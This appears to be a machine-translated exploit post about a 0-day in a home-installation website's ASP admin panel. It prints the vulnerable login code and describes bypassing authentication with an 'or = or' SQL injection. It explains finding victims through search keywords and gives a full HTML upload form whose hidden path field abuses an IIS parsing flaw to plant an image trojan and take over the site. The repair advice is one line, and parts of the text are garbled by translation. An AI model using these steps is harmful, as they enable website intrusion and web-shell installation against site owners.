0-day installation and repair of a home installation Network

Author: shangjian

Release date:

Vulnerability Type: File Upload

Vulnerability file: gd_ChkLogin.asp

Vulnerability description:

I paste some code for analysis.

 

<%

Dim user1, pass1, rs, SQL

User1 = trim (request ("textfield") "gets the input user name and assigns the value to user1"

Pass1 = trim (request ("textfield2") "Get the entered password and assign the value to pass1"

"No filtering is performed here"

If user1 = "" then

FoundErr = True

ErrMsg = ErrMsg & "<br> <li> the user name cannot be blank! </Li>"

End if

If pass1 = "" then

FoundErr = True

ErrMsg = ErrMsg & "<br> <li> the password cannot be blank! </Li>"

End if

If not isnumeric (request. form ("passcode") then

FoundErr = True

ErrMsg = ErrMsg & "<br> <li> the verification code must be a number. Please enter it correctly! </Li>"

Else if Session ("GetCode") <> Cint (request. form ("passcode") then

FoundErr = True

ErrMsg = ErrMsg & "<br> <li> the verification code is incorrect. Please enter it correctly! </Li>"

End if

End if

 

If FoundErr = True then

Call WriteErrMsg ()

Else

Set rs = server. CreateObject ("adodb. recordset ")

SQL = "select * from admin_door where admin_user =" & user1 & "and admin_pass =" & md5 (pass1 )&""

 

"Put the values obtained by user1 and pass1 into the query statement for query"

Rs. open SQL, conn, 1, 1

 

If rs. bof and rs. eof then

FoundErr = True

ErrMsg = ErrMsg & "<br> <li> the user name or password is incorrect! </Li>"

Call WriteErrMsg ()

Else

SessionTimeout = 40

Session. Timeout = SessionTimeout

Session ("admin_name") = rs ("admin_user ")

Session ("admin_quanxian") = rs ("admin_quanxian") Administrator permission

Session ("adminname") = rs ("admin_user ")

Response. redirect "default. asp"

End if

Rs. close

Set rs = nothing

End if

 

User1 and pass1 are not filtered. As a result, the backend can be bypassed with or = or.

Background address:/backdoor/gd_login.asp

Vulnerability exploitation:

Add/backdoor/gd_login.asp to the excavator

Keywords: Home Assembly Network (good keywords need to be searched by yourself)

Use or = or to enter the background. Save the code list as canjian.html

 

<Html>

<Head>

<Title> upload images </title>

<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">

<Style type = "text/css">

<! --

Td {font-size: 12px}

A {color: #000000; text-decoration: none}

A: hover {text-decoration: underline}

. Tx {height: 16px; width: 30px; border-color: black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 12px; background-color: # eeeeee; color: # 0000FF}

. Button {font-size: 12px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: # eeeeee; cursor: hand}

. Tx1 {height: 20px; width: 30px; font-size: 12px; border: 1px solid; border-color: black #000000; color: # 0000FF}

-->

</Style>

<Script language = "javascript">

<! --

Function mysub ()

{

Esave. style. visibility = "visible ";

}

-->

</Script>

</Head>

<Body bgcolor = "# FFFFFF" text = "#000000">

<Form name = "form1" method = "post" action = "http://www.xxx.com/backdoor/upload_asp.asp" enctype = "multipart/form-data">

<Div id = "esave" style = "position: absolute; top: 18px; left: 40px; z-index: 10; visibility: hidden">

<Table width = 340 BORDER = 0 CELLSPACING = 0 CELLPADDING = 0>

<TR> <td width = 20%> </td>

<TD bgcolor = # define a7b width = "60%">

<Table width = 100% height = 120 BORDER = 0 CELLSPACING = 1 CELLPADDING = 0>

<TR>

<Td bgcolor = # eeeeee align = center> <font color = red> uploading files. Please wait... </font> </td>

</Tr>

</Table>

</Td> <td width = 20%> </td>

</Tr> </table> </div>

<Table width = "400" border = "0" cellspacing = "1" cellpadding = "0" align = "center" bgcolor = "# D5D5D5">

<Tr>

<Td height = "22" align = "left" valign = "middle" width = "400"> upload images

 

<Input type = "hidden" name = "filepath" value = "../previusfile/Article/1.asp;">

<Input type = "hidden" name = "filelx" value = "jpg">

<Input type = "hidden" name = "EditName" value = "headpic">

<Input type = "hidden" name = "FormName" value = "myform">

<Input type = "hidden" name = "act" value = "previusfile">

</Td>

</Tr>

<Tr align = "center" valign = "middle" bgcolor = "# FFFFFF">

<Td align = "left" id = "upid" height = "80" width = "400"> select a file:

<Input type = "file" name = "file1" style = "width: 300" class = "tx1" value = "">

</Td>

</Tr>

<Tr align = "center" valign = "middle">

& Lt; td height = "24" width = "400" & gt;

<Input type = "submit" name = "Submit" value = "Upload" class = "button" onClick = "javascript: mysub ()">

</Td>

</Tr>

</Table>

</Form>

</Body>

</Html>

 

Directly upload an image Trojan.

Http://www.bkjia.com/backdoor/upload_asp.asp, here to complete the code! Here, www.2cto.com is the website address for your day.

Use the iis resolution vulnerability. Get website permissions...

Www.2cto.com provides a repair solution: user1 and pass1 for any filtering and iis7 upgrade.